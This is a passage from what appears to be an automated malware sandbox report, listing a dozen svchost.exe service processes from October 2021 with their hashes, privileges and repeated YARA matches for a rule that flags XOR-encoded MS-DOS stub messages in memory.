                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 2188 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:33
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 1512 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:35
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 1124 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:38
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 2468 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:40
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 664 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:42
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 2948 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:46
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 1452 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:48
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 1868 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:50
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 1340 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:52
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 3444 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:55
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 1188 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:58
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Analysis Process: svchost.exe PID: 5104 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:50:00
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >